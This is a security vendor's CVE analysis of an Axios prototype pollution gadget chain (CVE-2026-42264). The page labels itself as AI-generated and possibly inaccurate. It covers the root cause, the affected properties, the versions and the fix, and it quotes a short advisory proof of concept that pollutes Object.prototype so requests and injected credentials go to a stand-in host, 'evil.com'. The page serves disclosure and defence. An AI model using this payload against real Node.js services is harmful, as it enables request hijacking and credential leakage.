ZeroPath at Black Hat USA 2026

Axios CVE-2026-42264: Prototype Pollution Gadgets Enable Silent Request Hijacking and Credential Injection (PoC Included)

A brief summary of CVE-2026-42264, a high severity prototype pollution gadget chain in Axios versions 1.0.0 through 1.15.1 that allows silent credential injection and request hijacking. Includes the vendor-published proof of concept and mitigation guidance.

CVE Analysis

8 min read

ZeroPath CVE Analysis
ZeroPath CVE Analysis

2026-05-07

Axios CVE-2026-42264: Prototype Pollution Gadgets Enable Silent Request Hijacking and Credential Injection (PoC Included)
Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.

[email protected]

Introduction

Five configuration properties in the Axios HTTP adapter silently inherit attacker controlled values from a polluted Object.prototype, turning every outbound request in a Node.js process into a potential credential leak or redirect to a malicious server. With approximately 100 million weekly npm downloads, this prototype pollution gadget chain in Axios versions 1.0.0 through 1.15.1 (CVE-2026-42264, CVSS 7.4) represents a significant exposure surface for any organization running Node.js services that include third party dependencies capable of polluting prototypes.

Technical Information

Root Cause: Missing hasOwnProperty Guards

The vulnerability stems from an asymmetry in how Axios handles configuration merging versus configuration reading. The mergeConfig() function iterates using Object.keys(), which only returns own enumerable properties. When neither the defaults nor the user supplied configuration explicitly sets the five affected properties, they remain absent from the merged configuration object as own properties.

The HTTP adapter, however, reads these properties via direct property access (e.g., config.auth, config.baseURL). In JavaScript, direct property access traverses the prototype chain. If Object.prototype has been polluted by another dependency in the same process, the adapter silently picks up the attacker controlled values.

An existing own() helper function was already guarding eight other properties from this exact attack pattern. The five vulnerable properties were simply omitted from this protection in versions prior to 1.15.2.

The Five Gadget Properties

Each of the five unguarded properties maps to a concrete abuse path:

PropertySource LocationImpact
authlib/adapters/http.js line 617Injects attacker controlled Authorization header on all requests
baseURLlib/helpers/resolveConfig.js line 18Redirects all requests using relative URLs to an attacker controlled server
socketPathlib/adapters/http.js line 669Redirects requests to internal Unix sockets (e.g., Docker daemon), enabling SSRF
beforeRedirectlib/adapters/http.js line 698Executes attacker supplied callback during HTTP redirects
insecureHTTPParserlib/adapters/http.js line 712Enables Node.js insecure HTTP parser, potentially enabling request smuggling

Attack Flow

  1. Precondition: Another dependency in the same Node.js process performs prototype pollution. This could occur through a vulnerable deep merge utility, query string parser, or similar gadget. The attacker sets properties on Object.prototype such as auth, baseURL, or socketPath.

  2. Configuration merge: When an Axios request is initiated, mergeConfig() builds the final configuration object. Because Object.keys() only returns own properties, the polluted keys are not present in the merged config as own properties.

  3. Adapter reads polluted values: The HTTP adapter accesses config.auth, config.baseURL, etc. via direct property lookup. JavaScript's prototype chain resolution finds the attacker controlled values on Object.prototype.

  4. Silent exploitation: Depending on which properties are polluted, the attacker achieves credential injection (via auth), request redirection (via baseURL), SSRF to Unix sockets (via socketPath), arbitrary code execution during redirects (via beforeRedirect), or HTTP parser weakening (via insecureHTTPParser). All of this happens silently on every outbound Axios request.

Proof of Concept

A public, vendor published Proof of Concept exists for CVE-2026-42264. It is embedded directly within the official GitHub Security Advisory GHSA-q8qp-cvcw-x6jj, published on April 24, 2026, by the Axios maintainer jasonsaayman.

The following PoC is provided verbatim from the advisory:

const axios = require('axios'); // Prototype pollution from a vulnerable dependency in the same process Object.prototype.auth = { username: 'attacker', password: 'exfil' }; Object.prototype.baseURL = 'https://evil.com'; await axios.get('/api/users'); // Request is sent to: https://evil.com/api/users // With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw= // Attacker receives both the request and injected credentials

Exploitation mechanics: When another dependency in the same Node.js process performs prototype pollution (e.g., via a deep merge or query string parsing gadget), the attacker sets Object.prototype.auth and/or Object.prototype.baseURL. Because mergeConfig() uses Object.keys({...config1, ...config2}), which only returns own enumerable properties, the polluted keys are absent from the merged config object. However, the HTTP adapter subsequently reads them via direct property access (e.g., config.auth at lib/adapters/http.js line 617), which traverses the prototype chain and retrieves the attacker's values.

Impact demonstrated by the PoC:

  • Credential injection: An attacker controlled Authorization: Basic ... header is silently added to every outbound Axios request.
  • Request hijacking: All requests using relative URLs are redirected to the attacker's server (https://evil.com).
  • Additional gadgets not shown in the minimal PoC but documented in the advisory include: SSRF via socketPath (redirect to internal Unix sockets, e.g., Docker daemon), arbitrary code execution via beforeRedirect (attacker supplied callback), and HTTP parser weakening via insecureHTTPParser (enabling request smuggling).

The fix was merged via PR #10779 (commit 47915144662f2733e6c051bdcb895a8c8f0586aa) on April 20, 2026, into the v1.x branch and released in version 1.15.2.

Affected Systems and Versions

  • Package: axios (npm)
  • Vulnerable versions: 1.0.0 through 1.15.1 (inclusive)
  • Fixed version: 1.15.2
  • Affected component: Node.js HTTP adapter (lib/adapters/http.js) and configuration resolution (lib/helpers/resolveConfig.js)
  • CWE: CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes, commonly known as Prototype Pollution)
  • Precondition: Exploitation requires a separate prototype pollution source in the same Node.js process. This could be any dependency that performs unsafe deep merging, query string parsing, or similar operations on attacker controlled input.

Note that older widely deployed versions such as 1.13.2 remain exposed to these gadget surfaces in the presence of any prototype pollution in the process.

Vendor Security History

Axios has faced notable security challenges in recent months. On March 31, 2026, a supply chain compromise occurred when an attacker gained access to a lead maintainer account and published malicious versions 1.14.1 and 0.30.4. These versions injected a dependency called plain-crypto-js that installed a remote access trojan. Telemetry from Elastic Security Labs confirmed impacted organizations were running the malicious code in production environments.

In response, the Axios team implemented several security improvements: adoption of OpenID Connect trusted publishing, addition of GitHub Actions security scanners, pinning all action references to full commit hashes, and narrowing workflow permissions to least privilege. This response demonstrates a maturing security posture, though the proximity of these two incidents (supply chain compromise in March, prototype pollution disclosure in April/May) underscores the importance of continuous monitoring for Axios updates.

References

Detect & fix
what others miss

Works with
  • GitHub
  • GitLab
  • Bitbucket
  • Azure DevOps Services
  • Jira
  • Linear
  • Slack
  • Security Compass
Security magnifying glass visualization